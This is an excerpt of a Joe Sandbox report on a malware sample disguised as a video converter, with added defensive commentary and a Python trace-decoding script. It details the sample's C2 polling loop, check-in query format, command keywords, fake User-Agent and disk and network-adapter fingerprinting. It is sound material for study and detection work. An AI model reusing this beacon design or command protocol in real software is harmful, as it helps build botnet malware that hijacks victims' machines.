• _memset.LIBCMT ref: 02D87518
• _malloc.LIBCMT ref: 02D8758E
• _memset.LIBCMT ref: 02D8759F
• _strtok.LIBCMT ref: 02D875BF (response tokenised in place; together with the "%d;" format below this is the response parser)
• _swscanf.LIBCMT ref: 02D875D6
• _strtok.LIBCMT ref: 02D875ED
• _free.LIBCMT ref: 02D875F9
• Sleep.KERNEL32(000007D0), ref: 02D876F1 (0x7D0 = 2000 ms)
• _memset.LIBCMT ref: 02D87765
• RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D87772
• RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D87784
• _sprintf.LIBCMT ref: 02D87822
• RtlEnterCriticalSection.NTDLL(00000020), ref: 02D878E6 (argument recorded as 0x20 rather than the 02DB71B8 section used everywhere else in this routine)
• RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D8791A
Memory Dump Source
• Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
• API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
• String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
The String ID field is a "$"-separated list of the literals referenced by this routine: the "%d;" scanf format consumed by the _strtok/_swscanf loop, the "<htm" prefix (a check that the server returned an HTML page instead of a command body), a hard-coded User-Agent, and the command keywords auth_ip, auth_swith (sic), block, connect, disconnect, idle, updips, updurls and urls that the dispatcher matches against. Two of these are useful for detection: no Windows release reports itself as "Windows NT 9.0", so the User-Agent is a fingerprint rather than camouflage, and the misspelt auth_swith token is stable across the keyword set.
• API String ID: 696907137-1839899575
• Opcode ID: 80aee851289dc6dcf96b44dffecdd40675a2660cc4e1f3aee2420eec86598674
• Instruction ID: 8055ac4fbcca87c6e69aa9c61a7d3857ac256a5538fbf6a3c7983847e52625ec
• Opcode Fuzzy Hash: 80aee851289dc6dcf96b44dffecdd40675a2660cc4e1f3aee2420eec86598674
• Instruction Fuzzy Hash: D332DF32548381AFE725AB24D855FAFBBE6EF85314F10481DF58997391EB709C04CBA2
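The raw API list above only shows hexadecimal arguments, so the beacon's timeouts, request flags and sleep intervals have to be decoded by hand. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses trace lines in the report's "• Func.MODULE(args), ref: ADDR" form into named WinINet constants (values from wininet.h) and millisecond timings, and collapses them into a small network profile. The sample lines are copied from the list above; the line format, the helper names and the profile layout are assumptions made for this example.

```python
"""Decode WinINet / Sleep arguments from a Joe Sandbox API trace.

Added example; the constant values come from wininet.h, the sample trace is
copied from the report, everything else is constructed for illustration.
"""
import re

# wininet.h InternetSetOption dwOption values (subset that matters here)
INTERNET_OPTIONS = {
    1: "INTERNET_OPTION_CALLBACK",
    2: "INTERNET_OPTION_CONNECT_TIMEOUT",
    3: "INTERNET_OPTION_CONNECT_RETRIES",
    4: "INTERNET_OPTION_CONNECT_BACKOFF",
    5: "INTERNET_OPTION_SEND_TIMEOUT",
    6: "INTERNET_OPTION_RECEIVE_TIMEOUT",
    7: "INTERNET_OPTION_DATA_SEND_TIMEOUT",
    8: "INTERNET_OPTION_DATA_RECEIVE_TIMEOUT",
}
TIMEOUT_OPTIONS = {2, 5, 6, 7, 8}  # options whose value is a millisecond DWORD

# wininet.h INTERNET_FLAG_* bits accepted by InternetOpenUrl (subset)
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x10000000: "INTERNET_FLAG_ASYNC",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000400: "INTERNET_FLAG_HYPERLINK",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}

# Constructed sample: lines copied from the report's API list for the routine at 02D872AB.
SAMPLE_TRACE = """
• Sleep.KERNELBASE(0000EA60), ref: 02D86708
• InternetOpenA.WININET(?), ref: 02D872B5
• InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D872DD
• InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D872F5
• InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D8730D
• InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D87336
• InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D87358
• InternetCloseHandle.WININET(00000000), ref: 02D87378
• Sleep.KERNEL32(000007D0), ref: 02D876F1
"""

# "• Func.MODULE(args), ref: ADDR"; the argument list is optional (e.g. GetTickCount).
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<func>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_args(text):
    """'00000000,?,00001388' -> [0, None, 0x1388]; '?' is a value the tracer did not recover."""
    if not text:
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in text.split(",")]


def decode_flags(value):
    """Split an InternetOpenUrl dwFlags DWORD into named bits, keeping any unknown remainder."""
    names = [n for bit, n in sorted(INTERNET_FLAGS.items(), reverse=True) if value & bit]
    unknown = value & ~sum(INTERNET_FLAGS)
    if unknown:
        names.append(f"unknown:0x{unknown:08X}")
    return names


def decode_call(func, args):
    """Annotate the calls that define the beacon's network behaviour; other calls get no note."""
    if func == "Sleep" and args and args[0] is not None:
        return {"sleep_ms": args[0]}
    if func.startswith("InternetSetOption") and len(args) >= 2 and args[1] is not None:
        opt = args[1]
        note = {"option": INTERNET_OPTIONS.get(opt, f"option {opt}")}
        if opt in TIMEOUT_OPTIONS and len(args) >= 3 and args[2] is not None:
            note["timeout_ms"] = args[2]
        return note
    if func.startswith("InternetOpenUrl") and len(args) >= 5 and args[4] is not None:
        return {"flags": decode_flags(args[4])}
    if func == "InternetReadFile" and len(args) >= 3 and args[2] is not None:
        return {"read_chunk_bytes": args[2]}
    return {}


def parse_trace(text):
    """Return one dict per recognised trace line, with raw and decoded arguments."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = parse_args(m.group("args"))
        calls.append({"func": m.group("func"), "module": m.group("mod"),
                      "ref": int(m.group("ref"), 16), "args": args,
                      "note": decode_call(m.group("func"), args)})
    return calls


def beacon_profile(calls):
    """Collapse decoded calls into the facts a detection engineer wants: timeouts, flags, cadence."""
    profile = {"timeouts_ms": {}, "open_url_flags": [], "read_chunk_bytes": None, "sleeps_ms": []}
    for c in calls:
        n = c["note"]
        if "timeout_ms" in n:
            profile["timeouts_ms"][n["option"]] = n["timeout_ms"]
        if "flags" in n:
            profile["open_url_flags"] = n["flags"]
        if "read_chunk_bytes" in n:
            profile["read_chunk_bytes"] = n["read_chunk_bytes"]
        if "sleep_ms" in n:
            profile["sleeps_ms"].append(n["sleep_ms"])
    return profile


if __name__ == "__main__":
    for key, value in beacon_profile(parse_trace(SAMPLE_TRACE)).items():
        print(f"{key}: {value}")
```

Run on the sample trace this yields send and receive timeouts of 5000 ms, the flag pair INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_UI, 4096-byte reads and sleeps of 60000 ms and 2000 ms, which is the cadence to look for in proxy logs: one short HTTP GET per minute, no cached copy on disk, and a client that gives up after five seconds.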

Control-flow Graph
[Rendered graph (executed / not-executed colouring) omitted. This graph covers the enclosing function: a single initialisation block 02D8648B-02D866F1 (RtlInitializeCriticalSection, two GetModuleHandleA/GetProcAddress pairs, GetTickCount, GetVersionExA, eight _malloc calls, three GetProcessHeap/RtlAllocateHeap pairs, _memset x3, a critical-section enter/leave, QueryPerformanceCounter and Sleep) that falls into block 02D866F4, from which the polling loop already summarised above (Sleep at 02D86708, critical section 02DB71B8, InternetOpenA / InternetSetOptionA x3 / InternetOpenUrlA / InternetReadFile loop / InternetCloseHandle, _strtok and _swscanf response parsing at 02D875B9-02D875F6, dispatch through the helpers at 02D8439C, 02D9227C and 02D8A658) repeats indefinitely, every exit path returning to 02D866F4.]
APIs
• RtlInitializeCriticalSection.NTDLL(02DB71B8), ref: 02D864BA (the critical section at 02DB71B8 is the one the polling loop enters and leaves at 02D86713/02D86724, 02D873EE/02D873FF, 02D874AA/02D874B6 and 02D87772/02D87784)
• GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D864D1
• GetProcAddress.KERNEL32(00000000), ref: 02D864DA (resolves sprintf from ntdll.dll at run time instead of importing it)
• GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D864E9
• GetProcAddress.KERNEL32(00000000), ref: 02D864EC (resolves strcat from ntdll.dll the same way)
• GetTickCount.KERNEL32 ref: 02D864F8
  • Part of subcall function 02D8605A: _malloc.LIBCMT ref: 02D86068
• GetVersionExA.KERNEL32(02DB7010), ref: 02D86525 (OS version written to the OSVERSIONINFO structure at 02DB7010)
• _memset.LIBCMT ref: 02D86544
• _malloc.LIBCMT ref: 02D86551
  • Part of subcall function 02D92EEC: __FF_MSGBANNER.LIBCMT ref: 02D92F03
  • Part of subcall function 02D92EEC: __NMSG_WRITE.LIBCMT ref: 02D92F0A
  • Part of subcall function 02D92EEC: RtlAllocateHeap.NTDLL(007A0000,00000000,00000001), ref: 02D92F2F
• _malloc.LIBCMT ref: 02D86561
• _malloc.LIBCMT ref: 02D8656C
• _malloc.LIBCMT ref: 02D86577
• _malloc.LIBCMT ref: 02D86582
• _malloc.LIBCMT ref: 02D8658D
• _malloc.LIBCMT ref: 02D86598
• _malloc.LIBCMT ref: 02D865A7
• GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D865BE
• RtlAllocateHeap.NTDLL(00000000), ref: 02D865C7
• GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865D6
• RtlAllocateHeap.NTDLL(00000000), ref: 02D865D9
• GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865E4
• RtlAllocateHeap.NTDLL(00000000), ref: 02D865E7
(GetProcessHeap takes no arguments; the values the tracer shows beside it read as the Flags and Size already pushed for the RtlAllocateHeap that follows, i.e. three process-heap allocations of 4, 0x400 and 0x400 bytes.)
• _memset.LIBCMT ref: 02D865FA
• _memset.LIBCMT ref: 02D86606
• _memset.LIBCMT ref: 02D86613
• RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D86621
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D8662E
                                                                                • _malloc.LIBCMT ref: 02D86652
                                                                                • _malloc.LIBCMT ref: 02D86660
                                                                                • _malloc.LIBCMT ref: 02D86667
                                                                                • _malloc.LIBCMT ref: 02D8668D
                                                                                • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D866A0
                                                                                • Sleep.KERNELBASE ref: 02D866AE
                                                                                • _malloc.LIBCMT ref: 02D866BA
                                                                                • _malloc.LIBCMT ref: 02D866C7
                                                                                • _memset.LIBCMT ref: 02D866DC
                                                                                • _memset.LIBCMT ref: 02D866EC
                                                                                • Sleep.KERNELBASE(0000EA60), ref: 02D86708
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D86713
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D86724
                                                                                • _memset.LIBCMT ref: 02D86779
                                                                                • _memset.LIBCMT ref: 02D86788
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                • API String ID: 2251652938-2678694477
                                                                                • Opcode ID: d938453a7147966651074ce26eb67acf76acc0b7082b0c11c55fa08fa2afcef2
                                                                                • Instruction ID: 53881320f6604a740c56fe7d81f8204e5e518f3c781d601371b4c28bc2b39a40
                                                                                • Opcode Fuzzy Hash: d938453a7147966651074ce26eb67acf76acc0b7082b0c11c55fa08fa2afcef2
                                                                                • Instruction Fuzzy Hash: DB717271D48340ABE710AF74AC49B5FBBE9EF85724F100819F99597381DAB49C01CFA6

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 970 401b4b-401b68 LoadLibraryA 971 401c21-401c25 970->971 972 401b6e-401b7f GetProcAddress 970->972 973 401b85-401b8e 972->973 974 401c18-401c1b FreeLibrary 972->974 975 401b95-401ba5 GetAdaptersInfo 973->975 974->971 976 401ba7-401bb0 975->976 977 401bdb-401be3 975->977 978 401bc1-401bd7 call 402bc0 call 4018cc 976->978 979 401bb2-401bb6 976->979 980 401be5-401beb call 402ba6 977->980 981 401bec-401bf0 977->981 978->977 979->977 982 401bb8-401bbf 979->982 980->981 985 401bf2-401bf6 981->985 986 401c15-401c17 981->986 982->978 982->979 985->986 989 401bf8-401bfb 985->989 986->974 990 401c06-401c13 call 402b98 989->990 991 401bfd-401c03 989->991 990->975 990->986 991->990
                                                                                APIs
                                                                                • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                • API String ID: 514930453-3667123677
                                                                                • Opcode ID: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                                                • Instruction ID: 9300e3b8f0653b0f10764aaa79a1f2494f67c894d04353eb45b18fdb2f867aae
                                                                                • Opcode Fuzzy Hash: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                                                • Instruction Fuzzy Hash: 9621B870944109AFEF11DF65C944BEF7BB8EF41344F1440BAE504B22E1E778A985CB69

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1044 2d8f8da-2d8f8fd LoadLibraryA 1045 2d8f9bd-2d8f9c4 1044->1045 1046 2d8f903-2d8f911 GetProcAddress 1044->1046 1047 2d8f9b6-2d8f9b7 FreeLibrary 1046->1047 1048 2d8f917-2d8f927 1046->1048 1047->1045 1049 2d8f929-2d8f935 GetAdaptersInfo 1048->1049 1050 2d8f96d-2d8f975 1049->1050 1051 2d8f937 1049->1051 1053 2d8f97e-2d8f983 1050->1053 1054 2d8f977-2d8f97d call 2d936eb 1050->1054 1052 2d8f939-2d8f940 1051->1052 1057 2d8f94a-2d8f952 1052->1057 1058 2d8f942-2d8f946 1052->1058 1055 2d8f9b1-2d8f9b5 1053->1055 1056 2d8f985-2d8f988 1053->1056 1054->1053 1055->1047 1056->1055 1060 2d8f98a-2d8f98f 1056->1060 1062 2d8f955-2d8f95a 1057->1062 1058->1052 1061 2d8f948 1058->1061 1064 2d8f99c-2d8f9a7 call 2d93a8f 1060->1064 1065 2d8f991-2d8f999 1060->1065 1061->1050 1062->1062 1066 2d8f95c-2d8f969 call 2d8f629 1062->1066 1064->1055 1071 2d8f9a9-2d8f9ac 1064->1071 1065->1064 1066->1050 1071->1049
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D8F8F0
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D8F909
                                                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D8F92E
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 02D8F9B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                • API String ID: 514930453-3114217049
                                                                                • Opcode ID: 4c61804baad75c8849e088dad85dbd499fa182b57af56d5da91cfb126a4c15de
                                                                                • Instruction ID: a8e54df250ac2a753870cc034a2f680cfadcbf0d55985a12787fda4456519748
                                                                                • Opcode Fuzzy Hash: 4c61804baad75c8849e088dad85dbd499fa182b57af56d5da91cfb126a4c15de
                                                                                • Instruction Fuzzy Hash: 8721B171E04219AFDB10FFA8D880AEEBBB9EF05310F5440AAE945E7701D7309D45CBA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1129 2d8f7d6-2d8f801 CreateFileA 1130 2d8f8d2-2d8f8d9 1129->1130 1131 2d8f807-2d8f81c 1129->1131 1132 2d8f81f-2d8f841 DeviceIoControl 1131->1132 1133 2d8f87a-2d8f882 1132->1133 1134 2d8f843-2d8f84b 1132->1134 1137 2d8f88b-2d8f88d 1133->1137 1138 2d8f884-2d8f88a call 2d936eb 1133->1138 1135 2d8f84d-2d8f852 1134->1135 1136 2d8f854-2d8f859 1134->1136 1135->1133 1136->1133 1139 2d8f85b-2d8f863 1136->1139 1141 2d8f8c8-2d8f8d1 CloseHandle 1137->1141 1142 2d8f88f-2d8f892 1137->1142 1138->1137 1143 2d8f866-2d8f86b 1139->1143 1141->1130 1145 2d8f8ae-2d8f8bb call 2d93a8f 1142->1145 1146 2d8f894-2d8f89d GetLastError 1142->1146 1143->1143 1149 2d8f86d-2d8f879 call 2d8f629 1143->1149 1145->1141 1153 2d8f8bd-2d8f8c3 1145->1153 1146->1141 1147 2d8f89f-2d8f8a2 1146->1147 1147->1145 1150 2d8f8a4-2d8f8ab 1147->1150 1149->1133 1150->1145 1153->1132
                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D8F7F5
                                                                                • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D8F833
                                                                                • GetLastError.KERNEL32 ref: 02D8F894
                                                                                • CloseHandle.KERNELBASE(?), ref: 02D8F8CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                • String ID: \\.\PhysicalDrive0
                                                                                • API String ID: 4026078076-1180397377
                                                                                • Opcode ID: a480a95bded2e81307a930fd07ab66bb35d41bfc5ba2148c1187e43381dfc378
                                                                                • Instruction ID: 34115afae4896a8c48865a946f8dc94fcd511a992cf889da288502b1318b73a4
                                                                                • Opcode Fuzzy Hash: a480a95bded2e81307a930fd07ab66bb35d41bfc5ba2148c1187e43381dfc378
                                                                                • Instruction Fuzzy Hash: 3B31D0B1D0021AAFDB24EF95D884BAEBBB9FF05710F70416AE504A3780D7709E04CBA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1155 401a4f-401a77 CreateFileA 1156 401b45-401b4a 1155->1156 1157 401a7d-401a91 1155->1157 1158 401a98-401ac0 DeviceIoControl 1157->1158 1159 401ac2-401aca 1158->1159 1160 401af3-401afb 1158->1160 1161 401ad4-401ad9 1159->1161 1162 401acc-401ad2 1159->1162 1163 401b04-401b07 1160->1163 1164 401afd-401b03 call 402ba6 1160->1164 1161->1160 1165 401adb-401af1 call 402bc0 call 4018cc 1161->1165 1162->1160 1167 401b09-401b0c 1163->1167 1168 401b3a-401b44 CloseHandle 1163->1168 1164->1163 1165->1160 1171 401b27-401b34 call 402b98 1167->1171 1172 401b0e-401b17 GetLastError 1167->1172 1168->1156 1171->1158 1171->1168 1172->1168 1175 401b19-401b1c 1172->1175 1175->1171 1178 401b1e-401b24 1175->1178 1178->1171
                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                • GetLastError.KERNEL32 ref: 00401B0E
                                                                                • CloseHandle.KERNELBASE(?), ref: 00401B3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                • String ID: \\.\PhysicalDrive0
                                                                                • API String ID: 4026078076-1180397377
                                                                                • Opcode ID: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                                                • Instruction ID: c07866d4b4e887281577b2397114bebd63d98cfae9bba907e2345ee80fd6f57b
                                                                                • Opcode Fuzzy Hash: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                                                • Instruction Fuzzy Hash: 00316D71D01118EACB21EFA5CD849EFBBB9FF41750F20417AE515B22A0E3786E45CB98

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 472 2d86429-2d8643f 473 2d864ae-2d866f1 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2d842c7 GetTickCount call 2d8605a GetVersionExA call 2d94a30 call 2d92eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d94a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d92eec * 4 QueryPerformanceCounter Sleep call 2d92eec * 2 call 2d94a30 * 2 472->473 474 2d86441-2d86444 472->474 519 2d866f4-2d866f6 473->519 474->473 520 2d866f8-2d866fd 519->520 521 2d866ff-2d86701 519->521 522 2d86708 Sleep 520->522 523 2d8670e-2d86742 RtlEnterCriticalSection RtlLeaveCriticalSection 521->523 524 2d86703 521->524 522->523 525 2d86792 523->525 526 2d86744-2d86750 523->526 524->522 527 2d86796-2d872c3 InternetOpenA 525->527 526->525 528 2d86752-2d8675f 526->528 533 2d87389-2d8738f 527->533 534 2d872c9-2d87340 InternetSetOptionA * 3 call 2d94a30 InternetOpenUrlA 527->534 530 2d86761-2d86765 528->530 531 2d86767-2d86768 528->531 532 2d8676c-2d86790 call 2d94a30 * 2 530->532 531->532 532->527 536 2d873ab-2d873b9 533->536 537 2d87391-2d87397 533->537 547 2d87382-2d87383 InternetCloseHandle 534->547 548 2d87342 534->548 536->519 539 2d873bf-2d873e3 call 2d94a30 call 2d8439c 536->539 541 2d87399-2d8739b 537->541 542 2d8739d-2d873aa call 2d853ec 537->542 539->519 557 2d873e9-2d87417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d9227c 539->557 541->536 542->536 547->533 552 2d87346-2d8736c InternetReadFile 548->552 554 2d8736e-2d87375 552->554 555 2d87377-2d8737e InternetCloseHandle 552->555 554->552 555->547 560 2d87419-2d8742b call 2d9227c 557->560 561 2d8746d-2d87488 call 2d9227c 557->561 560->561 568 2d8742d-2d8743f call 2d9227c 560->568 566 2d8748e-2d87490 561->566 567 2d87742-2d87754 call 2d9227c 561->567 566->567 569 2d87496-2d87548 call 2d92eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2d94a30 * 5 call 2d8439c * 2 566->569 577 2d8779d-2d877af call 2d9227c 567->577 578 2d87756-2d87758 567->578 568->561 575 2d87441-2d87453 call 2d9227c 568->575 634 2d8754a-2d8754c 569->634 635 2d87585 569->635 575->561 589 2d87455-2d87467 call 2d9227c 575->589 590 2d877d0-2d877e2 call 2d9227c 577->590 591 2d877b1-2d877cb call 2d861f5 call 2d86303 call 2d8640e 577->591 578->577 582 2d8775a-2d87798 call 2d94a30 RtlEnterCriticalSection RtlLeaveCriticalSection 578->582 582->519 589->519 589->561 602 2d877e8-2d877ea 590->602 603 2d87b00-2d87b12 call 2d9227c 590->603 591->519 602->603 607 2d877f0-2d87807 call 2d8439c 602->607 603->519 615 2d87b18-2d87b46 call 2d92eec call 2d94a30 call 2d8439c 603->615 607->519 616 2d8780d-2d878db call 2d92358 call 2d81ba7 607->616 636 2d87b48-2d87b4a call 2d8534d 615->636 637 2d87b4f-2d87b56 call 2d92eb4 615->637 632 2d878dd call 2d8143f 616->632 633 2d878e2-2d87903 RtlEnterCriticalSection 616->633 632->633 640 2d8790f-2d87973 RtlLeaveCriticalSection call 2d83c67 call 2d83d7e call 2d8826e 633->640 641 2d87905-2d8790c 633->641 634->635 642 2d8754e-2d87560 call 2d9227c 634->642 638 2d87589-2d875b7 call 2d92eec call 2d94a30 call 2d8439c 635->638 636->637 637->519 665 2d875f8-2d87601 call 2d92eb4 638->665 666 2d875b9-2d875c8 call 2d93529 638->666 663 2d87979-2d879c1 call 2d8a658 640->663 664 2d87ae7-2d87afb call 2d88f36 640->664 641->640 642->635 652 2d87562-2d87583 call 2d8439c 642->652 652->638 675 2d87ab1-2d87ae2 call 2d8831d call 2d833b2 663->675 676 2d879c7-2d879ce 663->676 664->519 677 2d87738-2d8773b 665->677 678 2d87607-2d8761f call 2d93a8f 665->678 666->665 679 2d875ca 666->679 675->664 681 2d879d1-2d879d6 676->681 677->567 691 2d8762b 678->691 692 2d87621-2d87629 call 2d8966a 678->692 683 2d875cf-2d875e1 call 2d92790 679->683 681->681 686 2d879d8-2d87a23 call 2d8a658 681->686 694 2d875e3 683->694 695 2d875e6-2d875f6 call 2d93529 683->695 686->675 700 2d87a29-2d87a2f 686->700 693 2d8762d-2d876e5 call 2d8a782 call 2d83863 call 2d85119 call 2d83863 call 2d8aa28 call 2d8ab42 691->693 692->693 721 2d876ec-2d87717 Sleep call 2d91830 693->721 722 2d876e7 call 2d8380b 693->722 694->695 695->665 695->683 704 2d87a32-2d87a37 700->704 704->704 706 2d87a39-2d87a74 call 2d8a658 704->706 706->675 712 2d87a76-2d87ab0 call 2d8d04a 706->712 712->675 726 2d87719-2d87722 call 2d84100 721->726 727 2d87723-2d87731 721->727 722->721 726->727 727->677 729 2d87733 call 2d8380b 727->729 729->677
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.NTDLL(02DB71B8), ref: 02D864BA
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D864D1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D864DA
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D864E9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D864EC
                                                                                • GetTickCount.KERNEL32 ref: 02D864F8
                                                                                • GetVersionExA.KERNEL32(02DB7010), ref: 02D86525
                                                                                • _memset.LIBCMT ref: 02D86544
                                                                                • _malloc.LIBCMT ref: 02D86551
                                                                                • _malloc.LIBCMT ref: 02D86561
                                                                                • _malloc.LIBCMT ref: 02D8656C
                                                                                • _malloc.LIBCMT ref: 02D86577
                                                                                • _malloc.LIBCMT ref: 02D86582
                                                                                • _malloc.LIBCMT ref: 02D8658D
                                                                                • _malloc.LIBCMT ref: 02D86598
                                                                                • _malloc.LIBCMT ref: 02D865A7
                                                                                • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D865BE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D865C7
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865D6
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D865D9
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865E4
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D865E7
                                                                                • _memset.LIBCMT ref: 02D865FA
